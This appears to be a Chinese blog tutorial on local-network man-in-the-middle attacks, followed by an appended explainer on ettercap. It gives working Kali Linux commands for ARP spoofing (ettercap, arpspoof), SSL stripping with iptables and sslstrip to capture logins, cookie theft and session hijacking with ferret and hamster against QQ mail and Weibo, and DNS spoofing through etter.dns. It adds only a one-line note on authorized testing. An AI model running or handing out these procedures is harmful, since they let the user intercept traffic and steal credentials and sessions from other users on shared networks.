arp欺骗 DNS欺骗 会话劫持

【1】局域网中嗅探钓鱼 攻击arp欺骗 DNS欺骗 会话劫持
(1)arp欺骗–ettercap 相关文章http://www.91ri.org/4408.html
kali linux:
1.修改
vim /etc/NetworkManager/NetworkManager.conf
managed=true
重启网卡 service network-mannager restart
2.修改ettercap配置文件
vim /etc/ettercap/etter.conf
ec_uid=0 ec_gid=0
将iptables注释打开,如下在这里插入图片描述
echo 1>>/proc/sys/net/ipv4/ip_forward //ip转发功能开启
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote /192.168.81.20/ /192.168.81.1/
// //监听所有网段 捕获敏感数据(网址和账号和密码)
输入参数 L ,1
drifnet -i eth0 嗅探图片访问工具
(2)arp欺骗–arpspoof
echo 1>>/proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.81.1(网关) 192.168.81.132(本机)
drifnet -i eth0 嗅探图片访问工具
`数据包捕获 tcpdump wireshark drafnet(自动化工具)
tcpdump -i eth0 -w 123 .dump
(3)SSL数据嗅探
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)
sslstrip -p -l 10000 -w log.txt
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote // //
然后通过网段其他电脑的登录需要输入账号和密码的网站登录
(4)session劫持-arp欺骗
tcpdump -i eth0 -w qq.cap
ferret -r qq.cap(32位有此插件 64位需单独安装)
hamster
浏览器设置代理 hamster 127.0.0.1 1234
http://hamster(可以查看到qq.cap内的cooke,找到链接直接进入qq邮箱和微博)
选择目标
测试session
iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(删除)
/etc/source.list(64位kailinux 无ferret工具此方法安装)
在这里插入图片描述
在这里插入图片描述
(5)session劫持-DNS欺骗(钓鱼攻击)
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote // //
1.使用ettercap进行arp欺骗,vim /etc/ettercap
192.168.14.132为kailnux本机ip地址在这里插入图片描述
2.修改etter.dns文件 vim /etc/ettercap/etter.dns
3.启用dns_spoof(在执行ettercap命令后输入),激活需要几分钟时间
4.测试dns劫持是否成功
在这里插入图片描述

### Ettercap在会话劫持DNS欺骗中的使用方法和技巧 #### 一、Ettercap概述 Ettercap 是一款功能强大的网络嗅探工具,支持多种攻击方式,包括 ARP 欺骗DNS 欺骗会话劫持等[^1]。它通过中间人攻击(Man-in-the-Middle, MITM)技术实现对目标网络流量的拦截和篡改。 --- #### 二、会话劫持(Session Hijacking) 会话劫持是指攻击者通过某种手段获取用户的合法会话信息(如 Cookie 或 Session ID),从而冒充用户的身份进行操作。以下是使用 Ettercap 进行会话劫持的技术细节: 1. **环境准备** - 确保 Kali Linux 已安装 Ettercap 和 Apache2。 - 开启 IP 转发功能以避免断网攻击: ```bash echo 1 > /proc/sys/net/ipv4/ip_forward ``` - 启动 Apache2 服务用于模拟攻击服务器: ```bash service apache2 restart ``` 2. **配置 Ettercap** 编辑 Ettercap 配置文件以启用插件: ```bash sudo vi /etc/ettercap/etter.conf ``` 注释掉 `redir_command_on` 和 `redir_command_off` 的相关行,确保流量重定向正常工作[^1]。 3. **执行会话劫持命令** 使用以下命令启动 Ettercap 并进行 ARP 欺骗: ```bash ettercap -i eth0 -Tq -M arp:remote -P http_header /被攻击者IP// /网关IP// ``` 参数说明: - `-i eth0`:指定网卡。 - `-Tq`:文本模式和安静模式。 - `-M arp:remote`:执行远程 ARP 欺骗。 - `-P http_header`:启用 HTTP 头部分析插件,捕获敏感信息如 Cookies[^2]。 4. **捕获会话信息** 在 Ettercap 图形化界面中,选择目标主机并查看其会话数据包,提取关键的会话标识符(如 Cookie)[^1]。 --- #### 三、DNS欺骗DNS Spoofing) DNS 欺骗是通过伪造 DNS 响应,将用户请求的目标域名解析为攻击者的 IP 地址,从而实现流量劫持[^3]。以下是使用 Ettercap 进行 DNS 欺骗的具体步骤: 1. **修改 Ettercap DNS 配置文件** 编辑 `/etc/ettercap/etter.dns` 文件,添加自定义的 DNS 映射规则: ```bash sudo vi /etc/ettercap/etter.dns ``` 添加以下内容: ``` www.target.com A <攻击者IP> *.target.com A <攻击者IP> ``` 将目标域名解析到攻击者的 IP 地址[^4]。 2. **启动 DNS 欺骗攻击** 使用以下命令启动 Ettercap 并加载 DNS 欺骗插件: ```bash ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者IP// /网关IP// ``` 参数说明与会话劫持类似,但额外启用了 `-P dns_spoof` 插件[^2]。 3. **验证效果** 让靶机访问目标域名(如 `www.target.com`),观察是否成功跳转到攻击者的服务器页面[^4]。 --- #### 四、注意事项 - **法律合规性**:仅在授权环境下进行测试,避免非法行为。 - **流量转发**:确保开启 IP 转发功能,否则可能导致目标主机断网。 - **日志记录**:Ettercap 会生成详细的日志文件,可用于后续分析。 --- ### 示例代码 以下是一个简单的 Python 脚本,用于自动化检测目标主机的 DNS 解析结果: ```python import socket def check_dns_resolution(domain, expected_ip): try: resolved_ip = socket.gethostbyname(domain) if resolved_ip == expected_ip: print(f"[+] {domain} resolves to {resolved_ip}") else: print(f"[-] {domain} resolves incorrectly to {resolved_ip}") except Exception as e: print(f"Error resolving {domain}: {e}") # 测试目标域名 check_dns_resolution("www.target.com", "192.168.1.100") ``` --- ####
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值